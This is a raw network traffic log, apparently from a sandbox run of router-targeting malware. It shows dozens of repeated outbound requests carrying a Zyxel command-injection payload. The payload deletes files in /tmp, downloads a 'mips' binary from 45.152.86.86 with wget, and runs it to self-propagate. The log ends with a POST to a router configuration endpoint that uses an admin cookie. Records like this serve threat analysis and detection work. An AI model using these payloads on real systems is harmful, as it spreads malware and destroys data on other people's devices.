                              Mar 31, 2024 08:41:53.156486988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7053192.168.2.1358024114.118.242.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156508923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7054192.168.2.1349670162.72.122.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156529903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7055192.168.2.1352838110.157.121.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156585932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7056192.168.2.134529247.210.202.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156616926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7057192.168.2.1352776168.104.172.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156663895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7058192.168.2.134028235.125.157.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156698942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7059192.168.2.1344060148.194.26.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156728983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7060192.168.2.1343508219.38.161.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156752110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7061192.168.2.133389881.166.225.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156809092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7062192.168.2.134536025.170.178.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156879902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7063192.168.2.134995270.62.76.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156912088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7064192.168.2.134506032.70.164.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.156968117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7065192.168.2.134073892.248.119.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.157002926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7066192.168.2.1349050104.6.204.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.157071114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7067192.168.2.134399247.169.32.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.157104969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7068192.168.2.1337352202.184.151.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.157121897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7069192.168.2.133920040.154.232.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.157169104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7070192.168.2.134094239.1.185.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.157210112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7071192.168.2.1347048157.149.36.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:53.157255888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7072192.168.2.1357528219.113.52.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.163677931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7073192.168.2.1355196136.70.139.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.163712978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7074192.168.2.135680019.101.50.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.163748026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7075192.168.2.133424665.6.7.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.163780928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7076192.168.2.135668850.41.241.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.163827896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7077192.168.2.135564435.7.93.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.163865089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7078192.168.2.1335940159.107.81.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.163901091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7079192.168.2.1345288186.20.113.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.163943052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7080192.168.2.135909466.203.46.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.163995981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7081192.168.2.1342332196.4.241.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164035082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7082192.168.2.135429278.199.10.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164081097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7083192.168.2.1341316119.139.156.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164130926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7084192.168.2.1341154209.115.179.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164191961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7085192.168.2.1349984117.206.48.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164242983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7086192.168.2.1341210205.213.149.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164273024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7087192.168.2.1335572189.197.203.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164319992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7088192.168.2.1339052165.129.132.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164344072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7089192.168.2.1350352177.17.22.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164395094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7090192.168.2.1357662219.155.55.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164426088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7091192.168.2.1360110148.73.203.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164455891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7092192.168.2.1348604187.112.116.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164491892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7093192.168.2.135523280.175.136.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164557934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7094192.168.2.13559845.208.117.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164577961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7095192.168.2.1339130165.231.224.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164629936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7096192.168.2.1336988188.171.37.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164695024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7097192.168.2.1338808146.35.106.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164726019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7098192.168.2.135384661.128.150.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164772987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7099192.168.2.1335534125.18.67.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164814949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7100192.168.2.133994094.69.133.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164858103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7101192.168.2.1352166177.182.172.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164886951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7102192.168.2.1334586101.193.63.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164942026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7103192.168.2.1356246137.16.194.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.164978981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7104192.168.2.134114450.34.96.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165043116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7105192.168.2.1350750149.114.118.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165085077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7106192.168.2.133673492.168.121.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165123940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7107192.168.2.1343368183.57.99.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165169954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7108192.168.2.1360254129.154.94.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165229082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7109192.168.2.1357766216.44.237.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165263891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7110192.168.2.1355632164.195.83.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165278912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7111192.168.2.135771888.104.32.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165344954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7112192.168.2.1347254199.241.151.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165375948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7113192.168.2.134650620.123.163.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165406942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7114192.168.2.135441220.143.4.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165445089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7115192.168.2.1340638162.255.129.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165491104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7116192.168.2.135158245.134.180.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165539026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7117192.168.2.134768836.195.142.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:54.165569067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7118192.168.2.135202814.103.6.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:55.170864105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7119192.168.2.1353738193.99.38.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:55.170942068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7120192.168.2.1352584125.208.5.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:55.171013117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7121192.168.2.1342714104.22.18.98080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.153695107 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
